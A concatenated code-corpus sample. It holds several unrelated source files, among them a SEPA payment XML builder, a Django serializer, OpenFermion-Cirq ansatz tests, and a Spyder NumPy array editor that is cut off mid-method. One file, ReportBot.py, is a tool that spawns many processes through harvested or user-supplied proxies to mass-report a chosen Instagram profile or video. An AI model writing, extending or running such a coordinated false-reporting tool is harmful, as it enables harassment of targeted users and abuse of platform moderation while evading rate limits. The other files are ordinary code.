add_simple_child(data=construct_tag_data('UltmtCdtr'), child_friendly_name='name', child_tag_name='Nm', child_value=transaction.creditor.name) transaction_information['purpose'] = add_simple_child(data=construct_tag_data('Purp'), child_friendly_name='code', child_tag_name='Cd', child_value=transaction.ext_purpose) if not transaction.use_structured: transaction_information['remote_inf'] = add_simple_child(data=construct_tag_data('RmtInf'), child_friendly_name='unstructured', child_tag_name='Ustrd', child_value=transaction.purpose) else: rmt_inf = construct_tag_data('RmtInf') rmt_inf_strd = add_simple_child(data=construct_tag_data('Strd'), child_friendly_name='additional_info', child_tag_name='AddtlRmtInf', child_value=transaction.purpose) rmt_tp = construct_tag_data('Tp') rmt_tp['code_or_property'] = add_simple_child(data=construct_tag_data('CdOrPrtry'), child_friendly_name='code', child_tag_name='Cd', child_value='SCOR') rmt_creditor_ref_inf = add_simple_child(data=construct_tag_data('CdtrRefInf'), child_friendly_name='reference', child_tag_name='Ref', child_value=transaction.cref) rmt_creditor_ref_inf['tp'] = rmt_tp rmt_inf_strd['creditor_ref_information'] = rmt_creditor_ref_inf rmt_inf['structured'] = rmt_inf_strd transaction_information['remote_inf'] = rmt_inf return transaction_information def construct_payment_information(ctransfer): payment_inf = construct_tag_data('PmtInf') payment_inf['_sorting'] = ['PmtInfId', 'PmtMtd', 'BtchBookg', 'NbOfTxs', 'CtrlSum', 'PmtTpInf', 'ReqdExctnDt', 'Dbtr', 'DbtrAcct', 'DbtrAgt', 'ChrgBr', 'CdtTrfTxInf'] payment_inf['payment_id'] = construct_tag_data('PmtInfId', value=ctransfer.payment_id) payment_inf['payment_method'] = construct_tag_data('PmtMtd', value='TRF') payment_inf['batch'] = construct_tag_data('BtchBookg', value=str(ctransfer.batch).lower()) payment_inf['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions()) payment_inf['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum()) payment_instruction = construct_tag_data('PmtTpInf') payment_instruction['_sorting'] = ['InstrPrty', 'SvcLvl'] payment_instruction['priority'] = construct_tag_data('InstrPrty', value='NORM') payment_instruction['service_level'] = add_simple_child(construct_tag_data('SvcLvl'), 'code', 'Cd', [], 'SEPA') payment_inf['instruction'] = payment_instruction payment_inf['requested_execution_time'] = construct_tag_data('ReqdExctnDt', value=ctransfer.execution_time) payment_inf['debtor'] = construct_address_data(ctransfer.debtor, 'Dbtr') payment_inf['debtor_account'] = construct_iban(ctransfer.debtor, 'DbtrAcct') payment_inf['debtor_agent'] = construct_bic(ctransfer.debtor, 'DbtrAgt') payment_inf['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV') for i, payment in enumerate(ctransfer.transactions): transfer_information = construct_transaction_data(ctransfer, payment) payment_inf['transfer_no_%s' % i] = transfer_information return payment_inf def construct_document(ctransfer): root = construct_tag_data('Document', [('xmlns', 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03')]) message = construct_tag_data('CstmrCdtTrfInitn') message['_sorting'] = ['GrpHdr', 'PmtInf'] message['header'] = construct_header(ctransfer) message['payment_information'] = construct_payment_information(ctransfer) root['message'] = message return root
2.078125
2
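To see the intermediate structure these builders emit, a tiny illustration of construct_tag_data plus add_simple_child (the party name is invented):

data = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [], 'ACME GmbH')
# data == {'_name': 'InitgPty', '_attrs': [], '_value': None,
#          'name': {'_name': 'Nm', '_attrs': [], '_value': 'ACME GmbH'}}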
__main__.py
miezebieze/scott-launcher
1
1826
from enum import Enum from window import Window D = Enum ('Directions','N NE E SE S SW W NW') selector_map = { D.NW: [0.5,0.5], D.N: [1.5,0], D.NE: [2.5,0.5], D.W: [0,1.5], D.E: [3,1.5], D.SW: [0.5,2.5], D.S: [1.5,3], D.SE: [2.5,2.5], } selector_size = 100 window_size = selector_size*4 window = Window (window_size,window_size,selector_map,selector_size,selector_size) # set actions here from functools import partial def say (something): print (''.join (('Me: "',something,'"'))) window.actions[D.NW] = partial (say,'northwast') window.actions[D.N] = partial (say,'north') window.actions[D.NE] = partial (say,'neorthest') window.actions[D.W] = partial (say,'western') window.actions[D.E] = partial (say,'easy') window.actions[D.SW] = partial (say,'suess whest') window.actions[D.S] = partial (say,'sissy') window.actions[D.SE] = partial (say,'seoul') window.go ()
2.59375
3
cride/circles/serializers.py
monteals/C-Ride
0
1827
<gh_stars>0 from rest_framework import serializers from rest_framework.validators import UniqueValidator from cride.circles.models import Circle class CircleSerializer(serializers.Serializer): name = serializers.CharField() slug_name = serializers.SlugField() rides_taken = serializers.IntegerField() rides_offered = serializers.IntegerField() members_limit = serializers.IntegerField() class CreateCircleSerializer(serializers.Serializer): name = serializers.CharField(max_length=140) slug_name = serializers.CharField(max_length=40, validators=[UniqueValidator(queryset=Circle.objects.all())]) about = serializers.CharField(max_length=255, required=False) def create(self, data): return Circle.objects.create(**data)
2.390625
2
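A hedged illustration of the serializer above in use; it needs a configured Django project, since UniqueValidator and create() both hit the database:

payload = {'name': 'Drivers of Springfield', 'slug_name': 'springfield'}
serializer = CreateCircleSerializer(data=payload)
serializer.is_valid(raise_exception=True)
circle = serializer.save()  # dispatches to create(), i.e. Circle.objects.create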
figures/collide1a.py
brandon-rhodes/pycon2010-mighty-dictionary
22
1828
<gh_stars>10-100 import _dictdraw, sys d = {} surface = _dictdraw.draw_dictionary(d, [4]) surface.write_to_png(sys.argv[1])
2.03125
2
ReportBot.py
SeveNNoff/InstagramReportBot
1
1829
# coding=utf-8 #!/usr/bin/env python3 from libs.check_modules import check_modules from sys import exit from os import _exit check_modules() from os import path from libs.logo import print_logo from libs.utils import print_success from libs.utils import print_error from libs.utils import ask_question from libs.utils import print_status from libs.utils import parse_proxy_file from libs.proxy_harvester import find_proxies from libs.attack import report_profile_attack from libs.attack import report_video_attack from multiprocessing import Process from colorama import Fore, Back, Style def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i + n] def profile_attack_process(username, proxy_list): if (len(proxy_list) == 0): for _ in range(10): report_profile_attack(username, None) return for proxy in proxy_list: report_profile_attack(username, proxy) def video_attack_process(video_url, proxy_list): if (len(proxy_list) == 0): for _ in range(10): report_video_attack(video_url, None) return for proxy in proxy_list: report_video_attack(video_url, proxy) def video_attack(proxies): video_url = ask_question("Enter the link of the video you want to report") print(Style.RESET_ALL) if (len(proxies) == 0): for k in range(5): p = Process(target=video_attack_process, args=(video_url, [],)) p.start() print_status(str(k + 1) + ". Transaction Opened!") if (k == 5): print() return chunk = list(chunks(proxies, 10)) print("") print_status("Video complaint attack is on!\n") i = 1 for proxy_list in chunk: p = Process(target=video_attack_process, args=(video_url, proxy_list,)) p.start() print_status(str(i) + ". Transaction Opened!") if (k == 5): print() i = i + 1 def profile_attack(proxies): username = ask_question("Enter the username of the person you want to report") print(Style.RESET_ALL) if (len(proxies) == 0): for k in range(5): p = Process(target=profile_attack_process, args=(username, [],)) p.start() print_status(str(k + 1) + ". Transaction Opened!") return chunk = list(chunks(proxies, 10)) print("") print_status("Profile complaint attack is starting!\n") i = 1 for proxy_list in chunk: p = Process(target=profile_attack_process, args=(username, proxy_list,)) p.start() print_status(str(i) + ". Transaction Opened!") if (k == 5): print() i = i + 1 def main(): print_success("Modules loaded!\n") ret = ask_question("Would you like to use a proxy? [Y / N]") proxies = [] if (ret == "Y" or ret == "y"): ret = ask_question("Would you like to collect your proxies from the internet? [Y / N]") if (ret == "Y" or ret == "y"): print_status("Gathering proxy from the Internet! 
This may take a while.\n") proxies = find_proxies() elif (ret == "N" or ret == "n"): print_status("Please have a maximum of 50 proxies in a file!") file_path = ask_question("Enter the path to your proxy list") proxies = parse_proxy_file(file_path) else: print_error("Answer not understood, exiting!") exit() print_success(str(len(proxies)) + " Number of proxy found!\n") elif (ret == "N" or ret == "n"): pass else: print_error("Answer not understood, exiting!") exit() print("") print_status("1 - Report Profile.") print_status("2 - Report a video.") report_choice = ask_question("Please select the complaint method") print("") if (report_choice.isdigit() == False): print_error("The answer is not understood.") exit(0) if (int(report_choice) > 2 or int(report_choice) == 0): print_error("The answer is not understood.") exit(0) if (int(report_choice) == 1): profile_attack(proxies) elif (int(report_choice) == 2): video_attack(proxies) if __name__ == "__main__": print_logo() try: main() print(Style.RESET_ALL) except KeyboardInterrupt: print("\n\n" + Fore.RED + "[*] Program is closing!") print(Style.RESET_ALL) _exit(0)
2.390625
2
openfermioncirq/variational/ansatzes/default_initial_params_test.py
viathor/OpenFermion-Cirq
0
1830
<gh_stars>0 # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy import pytest import cirq import openfermion from openfermioncirq import ( HamiltonianObjective, LowRankTrotterAnsatz, SplitOperatorTrotterAnsatz, SwapNetworkTrotterAnsatz, SwapNetworkTrotterHubbardAnsatz, VariationalStudy, prepare_gaussian_state, simulate_trotter) from openfermioncirq.trotter import ( LINEAR_SWAP_NETWORK, LOW_RANK, LowRankTrotterAlgorithm, SPLIT_OPERATOR) # 4-qubit random DiagonalCoulombHamiltonian diag_coul_hamiltonian = openfermion.random_diagonal_coulomb_hamiltonian( 4, real=True, seed=47141) # 4-qubit H2 2-2 with bond length 0.7414 bond_length = 0.7414 geometry = [('H', (0., 0., 0.)), ('H', (0., 0., bond_length))] h2_hamiltonian = openfermion.load_molecular_hamiltonian( geometry, 'sto-3g', 1, format(bond_length), 2, 2) # 4-qubit LiH 2-2 with bond length 1.45 bond_length = 1.45 geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., bond_length))] lih_hamiltonian = openfermion.load_molecular_hamiltonian( geometry, 'sto-3g', 1, format(bond_length), 2, 2) @pytest.mark.parametrize( 'ansatz, trotter_algorithm, order, hamiltonian, atol', [ (SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=1), LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5), (SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=1), SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5), (LowRankTrotterAnsatz(h2_hamiltonian, iterations=1), LOW_RANK, 0, h2_hamiltonian, 5e-5), (LowRankTrotterAnsatz(lih_hamiltonian, iterations=1, final_rank=3), LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 5e-5), (SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=1), LINEAR_SWAP_NETWORK, 1, openfermion.get_diagonal_coulomb_hamiltonian( openfermion.reorder( openfermion.fermi_hubbard(2, 2, 1.0, 4.0), openfermion.up_then_down) ), 5e-5) ]) def test_trotter_ansatzes_default_initial_params_iterations_1( ansatz, trotter_algorithm, order, hamiltonian, atol): """Check that a Trotter ansatz with one iteration and default parameters is consistent with time evolution with one Trotter step.""" objective = HamiltonianObjective(hamiltonian) qubits = ansatz.qubits if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): one_body = hamiltonian.one_body elif isinstance(hamiltonian, openfermion.InteractionOperator): one_body = hamiltonian.one_body_tensor if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz): occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4)) else: occupied_orbitals = range(len(qubits)//2) preparation_circuit = cirq.Circuit( prepare_gaussian_state( qubits, openfermion.QuadraticHamiltonian(one_body), occupied_orbitals=occupied_orbitals ) ) # Compute value using ansatz circuit and objective circuit = cirq.resolve_parameters( preparation_circuit + ansatz.circuit, ansatz.param_resolver(ansatz.default_initial_params())) result = circuit.final_wavefunction( qubit_order=ansatz.qubit_permutation(qubits)) obj_val = objective.value(result) # Compute value using study study = VariationalStudy( 'study', ansatz, objective, 
preparation_circuit=preparation_circuit) study_val = study.value_of(ansatz.default_initial_params()) # Compute value by simulating time evolution if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): half_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.5 * hamiltonian.two_body) elif isinstance(hamiltonian, openfermion.InteractionOperator): half_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.5 * hamiltonian.two_body_tensor) simulation_circuit = cirq.Circuit( simulate_trotter( qubits, half_way_hamiltonian, time=ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm) ) final_state = ( preparation_circuit + simulation_circuit).final_wavefunction() correct_val = openfermion.expectation( objective._hamiltonian_linear_op, final_state).real numpy.testing.assert_allclose(obj_val, study_val, atol=atol) numpy.testing.assert_allclose(obj_val, correct_val, atol=atol) @pytest.mark.parametrize( 'ansatz, trotter_algorithm, order, hamiltonian, atol', [ (SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=2), LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5), (SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=2), SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5), (LowRankTrotterAnsatz(h2_hamiltonian, iterations=2), LOW_RANK, 0, h2_hamiltonian, 5e-5), (LowRankTrotterAnsatz(lih_hamiltonian, iterations=2, final_rank=3), LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 1e-3), (SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=2), LINEAR_SWAP_NETWORK, 1, openfermion.get_diagonal_coulomb_hamiltonian( openfermion.reorder( openfermion.fermi_hubbard(2, 2, 1.0, 4.0), openfermion.up_then_down) ), 5e-5) ]) def test_trotter_ansatzes_default_initial_params_iterations_2( ansatz, trotter_algorithm, order, hamiltonian, atol): """Check that a Trotter ansatz with two iterations and default parameters is consistent with time evolution with two Trotter steps.""" objective = HamiltonianObjective(hamiltonian) qubits = ansatz.qubits if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): one_body = hamiltonian.one_body elif isinstance(hamiltonian, openfermion.InteractionOperator): one_body = hamiltonian.one_body_tensor if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz): occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4)) else: occupied_orbitals = range(len(qubits)//2) preparation_circuit = cirq.Circuit( prepare_gaussian_state( qubits, openfermion.QuadraticHamiltonian(one_body), occupied_orbitals=occupied_orbitals ) ) # Compute value using ansatz circuit and objective circuit = cirq.resolve_parameters( preparation_circuit + ansatz.circuit, ansatz.param_resolver(ansatz.default_initial_params())) result = circuit.final_wavefunction( qubit_order=ansatz.qubit_permutation(qubits)) obj_val = objective.value(result) # Compute value using study study = VariationalStudy( 'study', ansatz, objective, preparation_circuit=preparation_circuit) study_val = study.value_of(ansatz.default_initial_params()) # Compute value by simulating time evolution if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): quarter_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.25 * hamiltonian.two_body) three_quarters_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.75 * hamiltonian.two_body) 
elif isinstance(hamiltonian, openfermion.InteractionOperator): quarter_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.25 * hamiltonian.two_body_tensor) three_quarters_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.75 * hamiltonian.two_body_tensor) simulation_circuit = cirq.Circuit( simulate_trotter( qubits, quarter_way_hamiltonian, time=0.5 * ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm), simulate_trotter( qubits, three_quarters_way_hamiltonian, time=0.5 * ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm) ) final_state = ( preparation_circuit + simulation_circuit).final_wavefunction() correct_val = openfermion.expectation( objective._hamiltonian_linear_op, final_state).real numpy.testing.assert_allclose(obj_val, study_val, atol=atol) numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
1.617188
2
spyder/plugins/variableexplorer/widgets/arrayeditor.py
seryj/spyder
0
1831
# -*- coding: utf-8 -*- # # Copyright © Spyder Project Contributors # Licensed under the terms of the MIT License # (see spyder/__init__.py for details) """ NumPy Array Editor Dialog based on Qt """ # pylint: disable=C0103 # pylint: disable=R0903 # pylint: disable=R0911 # pylint: disable=R0201 # Standard library imports from __future__ import print_function # Third party imports from qtpy.compat import from_qvariant, to_qvariant from qtpy.QtCore import (QAbstractTableModel, QItemSelection, QLocale, QItemSelectionRange, QModelIndex, Qt, Slot) from qtpy.QtGui import QColor, QCursor, QDoubleValidator, QKeySequence from qtpy.QtWidgets import (QAbstractItemDelegate, QApplication, QCheckBox, QComboBox, QDialog, QDialogButtonBox, QGridLayout, QHBoxLayout, QInputDialog, QItemDelegate, QLabel, QLineEdit, QMenu, QMessageBox, QPushButton, QSpinBox, QStackedWidget, QTableView, QVBoxLayout, QWidget) import numpy as np # Local imports from spyder.config.base import _ from spyder.config.fonts import DEFAULT_SMALL_DELTA from spyder.config.gui import get_font, config_shortcut from spyder.py3compat import (io, is_binary_string, is_string, is_text_string, PY3, to_binary_string, to_text_string) from spyder.utils import icon_manager as ima from spyder.utils.qthelpers import add_actions, create_action, keybinding # Note: string and unicode data types will be formatted with '%s' (see below) SUPPORTED_FORMATS = { 'single': '%.6g', 'double': '%.6g', 'float_': '%.6g', 'longfloat': '%.6g', 'float16': '%.6g', 'float32': '%.6g', 'float64': '%.6g', 'float96': '%.6g', 'float128': '%.6g', 'csingle': '%r', 'complex_': '%r', 'clongfloat': '%r', 'complex64': '%r', 'complex128': '%r', 'complex192': '%r', 'complex256': '%r', 'byte': '%d', 'bytes8': '%s', 'short': '%d', 'intc': '%d', 'int_': '%d', 'longlong': '%d', 'intp': '%d', 'int8': '%d', 'int16': '%d', 'int32': '%d', 'int64': '%d', 'ubyte': '%d', 'ushort': '%d', 'uintc': '%d', 'uint': '%d', 'ulonglong': '%d', 'uintp': '%d', 'uint8': '%d', 'uint16': '%d', 'uint32': '%d', 'uint64': '%d', 'bool_': '%r', 'bool8': '%r', 'bool': '%r', } LARGE_SIZE = 5e5 LARGE_NROWS = 1e5 LARGE_COLS = 60 #============================================================================== # Utility functions #============================================================================== def is_float(dtype): """Return True if datatype dtype is a float kind""" return ('float' in dtype.name) or dtype.name in ['single', 'double'] def is_number(dtype): """Return True if datatype dtype is a number kind""" return is_float(dtype) or ('int' in dtype.name) or ('long' in dtype.name) \ or ('short' in dtype.name) def get_idx_rect(index_list): """Extract the boundaries from a list of indexes""" rows, cols = list(zip(*[(i.row(), i.column()) for i in index_list])) return ( min(rows), max(rows), min(cols), max(cols) ) #============================================================================== # Main classes #============================================================================== class ArrayModel(QAbstractTableModel): """Array Editor Table Model""" ROWS_TO_LOAD = 500 COLS_TO_LOAD = 40 def __init__(self, data, format="%.6g", xlabels=None, ylabels=None, readonly=False, parent=None): QAbstractTableModel.__init__(self) self.dialog = parent self.changes = {} self.xlabels = xlabels self.ylabels = ylabels self.readonly = readonly self.test_array = np.array([0], dtype=data.dtype) # for complex numbers, shading will be based on absolute value # but for all other types it will be the real part if data.dtype in 
                                 (np.complex64, np.complex128):
            self.color_func = np.abs
        else:
            self.color_func = np.real
        # Background color settings
        huerange = [.66, .99]  # Hue
        self.sat = .7   # Saturation
        self.val = 1.   # Value
        self.alp = .6   # Alpha-channel

        self._data = data
        self._format = format

        self.total_rows = self._data.shape[0]
        self.total_cols = self._data.shape[1]
        size = self.total_rows * self.total_cols

        try:
            self.vmin = np.nanmin(self.color_func(data))
            self.vmax = np.nanmax(self.color_func(data))
            if self.vmax == self.vmin:
                self.vmin -= 1
            self.hue0 = huerange[0]
            self.dhue = huerange[1] - huerange[0]
            self.bgcolor_enabled = True
        except (TypeError, ValueError):
            self.vmin = None
            self.vmax = None
            self.hue0 = None
            self.dhue = None
            self.bgcolor_enabled = False

        # Use paging when the total size, number of rows or number of
        # columns is too large
        if size > LARGE_SIZE:
            self.rows_loaded = self.ROWS_TO_LOAD
            self.cols_loaded = self.COLS_TO_LOAD
        else:
            if self.total_rows > LARGE_NROWS:
                self.rows_loaded = self.ROWS_TO_LOAD
            else:
                self.rows_loaded = self.total_rows
            if self.total_cols > LARGE_COLS:
                self.cols_loaded = self.COLS_TO_LOAD
            else:
                self.cols_loaded = self.total_cols

    def get_format(self):
        """Return current format"""
        # Avoid accessing the private attribute _format from outside
        return self._format

    def get_data(self):
        """Return data"""
        return self._data

    def set_format(self, format):
        """Change display format"""
        self._format = format
        self.reset()

    def columnCount(self, qindex=QModelIndex()):
        """Array column number"""
        if self.total_cols <= self.cols_loaded:
            return self.total_cols
        else:
            return self.cols_loaded

    def rowCount(self, qindex=QModelIndex()):
        """Array row number"""
        if self.total_rows <= self.rows_loaded:
            return self.total_rows
        else:
            return self.rows_loaded

    def can_fetch_more(self, rows=False, columns=False):
        if rows:
            if self.total_rows > self.rows_loaded:
                return True
            else:
                return False
        if columns:
            if self.total_cols > self.cols_loaded:
                return True
            else:
                return False

    def fetch_more(self, rows=False, columns=False):
        if self.can_fetch_more(rows=rows):
            remainder = self.total_rows - self.rows_loaded
            items_to_fetch = min(remainder, self.ROWS_TO_LOAD)
            self.beginInsertRows(QModelIndex(), self.rows_loaded,
                                 self.rows_loaded + items_to_fetch - 1)
            self.rows_loaded += items_to_fetch
            self.endInsertRows()
        if self.can_fetch_more(columns=columns):
            remainder = self.total_cols - self.cols_loaded
            items_to_fetch = min(remainder, self.COLS_TO_LOAD)
            self.beginInsertColumns(QModelIndex(), self.cols_loaded,
                                    self.cols_loaded + items_to_fetch - 1)
            self.cols_loaded += items_to_fetch
            self.endInsertColumns()

    def bgcolor(self, state):
        """Toggle background color"""
        self.bgcolor_enabled = state > 0
        self.reset()

    def get_value(self, index):
        i = index.row()
        j = index.column()
        if len(self._data.shape) == 1:
            value = self._data[j]
        else:
            value = self._data[i, j]
        return self.changes.get((i, j), value)

    def data(self, index, role=Qt.DisplayRole):
        """Cell content"""
        if not index.isValid():
            return to_qvariant()
        value = self.get_value(index)
        if is_binary_string(value):
            try:
                value = to_text_string(value, 'utf8')
            except:
                pass
        if role == Qt.DisplayRole:
            if value is np.ma.masked:
                return ''
            else:
                try:
                    return to_qvariant(self._format % value)
                except TypeError:
                    self.readonly = True
                    return repr(value)
        elif role == Qt.TextAlignmentRole:
            return to_qvariant(int(Qt.AlignCenter | Qt.AlignVCenter))
        elif role == Qt.BackgroundColorRole and self.bgcolor_enabled \
                and value is not np.ma.masked:
            try:
                hue = (self.hue0 +
                       self.dhue * (float(self.vmax) - self.color_func(value))
                       / (float(self.vmax) - self.vmin))
                hue = float(np.abs(hue))
                color = QColor.fromHsvF(hue, self.sat, self.val, self.alp)
                return to_qvariant(color)
            except TypeError:
                return to_qvariant()
        elif role == Qt.FontRole:
            return to_qvariant(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
        return to_qvariant()

    def setData(self, index, value, role=Qt.EditRole):
        """Cell content change"""
        if not index.isValid() or self.readonly:
            return False
        i = index.row()
        j = index.column()
        value = from_qvariant(value, str)
        dtype = self._data.dtype.name
        if dtype == "bool":
            try:
                val = bool(float(value))
            except ValueError:
                val = value.lower() == "true"
        elif dtype.startswith("string") or dtype.startswith("bytes"):
            val = to_binary_string(value, 'utf8')
        elif dtype.startswith("unicode") or dtype.startswith("str"):
            val = to_text_string(value)
        else:
            if value.lower().startswith('e') or value.lower().endswith('e'):
                return False
            try:
                val = complex(value)
                if not val.imag:
                    val = val.real
            except ValueError as e:
                QMessageBox.critical(self.dialog, "Error",
                                     "Value error: %s" % str(e))
                return False
        try:
            self.test_array[0] = val  # will raise an Exception eventually
        except OverflowError as e:
            print("OverflowError: " + str(e))  # spyder: test-skip
            QMessageBox.critical(self.dialog, "Error",
                                 "Overflow error: %s" % str(e))
            return False

        # Add change to self.changes
        self.changes[(i, j)] = val
        self.dataChanged.emit(index, index)
        if not is_string(val):
            if val > self.vmax:
                self.vmax = val
            if val < self.vmin:
                self.vmin = val
        return True

    def flags(self, index):
        """Set editable flag"""
        if not index.isValid():
            return Qt.ItemIsEnabled
        return Qt.ItemFlags(QAbstractTableModel.flags(self, index) |
                            Qt.ItemIsEditable)

    def headerData(self, section, orientation, role=Qt.DisplayRole):
        """Set header data"""
        if role != Qt.DisplayRole:
            return to_qvariant()
        labels = self.xlabels if orientation == Qt.Horizontal else self.ylabels
        if labels is None:
            return to_qvariant(int(section))
        else:
            return to_qvariant(labels[section])

    def reset(self):
        self.beginResetModel()
        self.endResetModel()


class ArrayDelegate(QItemDelegate):
    """Array Editor Item Delegate"""
    def __init__(self, dtype, parent=None):
        QItemDelegate.__init__(self, parent)
        self.dtype = dtype

    def createEditor(self, parent, option, index):
        """Create editor widget"""
        model = index.model()
        value = model.get_value(index)
        if model._data.dtype.name == "bool":
            value = not value
            model.setData(index, to_qvariant(value))
            return
        elif value is not np.ma.masked:
            editor = QLineEdit(parent)
            editor.setFont(get_font(font_size_delta=DEFAULT_SMALL_DELTA))
            editor.setAlignment(Qt.AlignCenter)
            if is_number(self.dtype):
                validator = QDoubleValidator(editor)
                validator.setLocale(QLocale('C'))
                editor.setValidator(validator)
            editor.returnPressed.connect(self.commitAndCloseEditor)
            return editor

    def commitAndCloseEditor(self):
        """Commit and close editor"""
        editor = self.sender()
        # Avoid a segfault with PyQt5. Variable value won't be changed
        # but at least Spyder won't crash. It seems generated by a bug in sip.
        try:
            self.commitData.emit(editor)
        except AttributeError:
            pass
        self.closeEditor.emit(editor, QAbstractItemDelegate.NoHint)

    def setEditorData(self, editor, index):
        """Set editor widget's data"""
        text = from_qvariant(index.model().data(index, Qt.DisplayRole), str)
        editor.setText(text)


# TODO: Implement "Paste" (from clipboard) feature
class ArrayView(QTableView):
    """Array view class"""
    def __init__(self, parent, model, dtype, shape):
        QTableView.__init__(self, parent)
        self.setModel(model)
        self.setItemDelegate(ArrayDelegate(dtype, self))
        total_width = 0
        for k in range(shape[1]):
            total_width += self.columnWidth(k)
        self.viewport().resize(min(total_width, 1024), self.height())
        self.shape = shape
        self.menu = self.setup_menu()
        config_shortcut(self.copy, context='variable_explorer', name='copy',
                        parent=self)
        self.horizontalScrollBar().valueChanged.connect(
            lambda val: self.load_more_data(val, columns=True))
        self.verticalScrollBar().valueChanged.connect(
            lambda val: self.load_more_data(val, rows=True))

    def load_more_data(self, value, rows=False, columns=False):
        try:
            old_selection = self.selectionModel().selection()
            old_rows_loaded = old_cols_loaded = None

            if rows and value == self.verticalScrollBar().maximum():
                old_rows_loaded = self.model().rows_loaded
                self.model().fetch_more(rows=rows)

            if columns and value == self.horizontalScrollBar().maximum():
                old_cols_loaded = self.model().cols_loaded
                self.model().fetch_more(columns=columns)

            if old_rows_loaded is not None or old_cols_loaded is not None:
                # if we've changed anything, update selection
                new_selection = QItemSelection()
                for part in old_selection:
                    top = part.top()
                    bottom = part.bottom()
                    if (old_rows_loaded is not None and
                            top == 0 and bottom == (old_rows_loaded - 1)):
                        # complete column selected (so expand it to match
                        # updated range)
                        bottom = self.model().rows_loaded - 1
                    left = part.left()
                    right = part.right()
                    if (old_cols_loaded is not None and
                            left == 0 and right == (old_cols_loaded - 1)):
                        # complete row selected (so expand it to match updated
                        # range)
                        right = self.model().cols_loaded - 1
                    top_left = self.model().index(top, left)
                    bottom_right = self.model().index(bottom, right)
                    part = QItemSelectionRange(top_left, bottom_right)
                    new_selection.append(part)
                self.selectionModel().select(
                    new_selection, self.selectionModel().ClearAndSelect)
        except NameError:
            # Needed to handle a NameError while fetching data when closing
            # See issue 7880
            pass

    def resize_to_contents(self):
        """Resize cells to contents"""
        QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
        self.resizeColumnsToContents()
        self.model().fetch_more(columns=True)
        self.resizeColumnsToContents()
        QApplication.restoreOverrideCursor()

    def setup_menu(self):
        """Setup context menu"""
        self.copy_action = create_action(self, _('Copy'),
                                         shortcut=keybinding('Copy'),
                                         icon=ima.icon('editcopy'),
                                         triggered=self.copy,
                                         context=Qt.WidgetShortcut)
        menu = QMenu(self)
        add_actions(menu, [self.copy_action, ])
        return menu

    def contextMenuEvent(self, event):
        """Reimplement Qt method"""
        self.menu.popup(event.globalPos())
        event.accept()

    def keyPressEvent(self, event):
        """Reimplement Qt method"""
        if event == QKeySequence.Copy:
            self.copy()
        else:
            QTableView.keyPressEvent(self, event)

    def _sel_to_text(self, cell_range):
        """Copy an array portion to a unicode string"""
        if not cell_range:
            return
        row_min, row_max, col_min, col_max = get_idx_rect(cell_range)
        if col_min == 0 and col_max == (self.model().cols_loaded - 1):
            # we've selected a whole column. It isn't possible to
            # select only the first part of a column without loading more,
            # so we can treat it as intentional and copy the whole thing
            col_max = self.model().total_cols - 1
        if row_min == 0 and row_max == (self.model().rows_loaded - 1):
            row_max = self.model().total_rows - 1

        _data = self.model().get_data()
        if PY3:
            output = io.BytesIO()
        else:
            output = io.StringIO()
        try:
            np.savetxt(output, _data[row_min:row_max + 1, col_min:col_max + 1],
                       delimiter='\t', fmt=self.model().get_format())
        except:
            QMessageBox.warning(self, _("Warning"),
                                _("It was not possible to copy values for "
                                  "this array"))
            return
        contents = output.getvalue().decode('utf-8')
        output.close()
        return contents

    @Slot()
    def copy(self):
        """Copy text to clipboard"""
        cliptxt = self._sel_to_text(self.selectedIndexes())
        clipboard = QApplication.clipboard()
